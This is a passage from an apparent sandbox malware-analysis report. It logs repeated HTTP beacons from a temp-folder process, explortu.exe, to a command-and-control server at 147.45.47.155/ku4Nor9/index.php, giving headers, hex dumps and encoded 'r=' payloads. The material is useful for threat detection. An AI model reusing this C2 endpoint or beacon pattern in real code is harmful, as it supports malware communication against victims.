                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:15.357520103 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.649740147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:15.472258091 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:16.150598049 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:16.151519060 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:16.360413074 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.649741147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:16.472306967 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:17.160270929 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:17.161170959 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:17.372956038 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.649742147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:17.489502907 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:18.170660019 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:18 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:18.171590090 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:18.381099939 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:18 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.649743147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:18.488421917 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:19.158246040 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:19.159132957 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:19.367139101 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.649744147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:19.489101887 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:20.177028894 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:20.177870989 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:20.593025923 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.649745147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:20.706659079 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:21.388506889 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:21 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:21.389524937 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:21.600533962 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:21 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.649746147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:21.724668980 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:22.391547918 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:22.392652988 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:22.606587887 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.649748147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:22.722816944 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:23.393212080 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:23.394161940 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:23.601664066 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.649749147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:23.722434044 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:24.399316072 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:24 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:24.400722027 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:24.608896017 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:24 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.649750147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:24.723287106 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:25.390506983 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:25.396156073 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:25.603744984 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.649751147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:25.923144102 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:26.592875004 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:26.593794107 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:26.800179005 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.649752147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:26.910134077 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
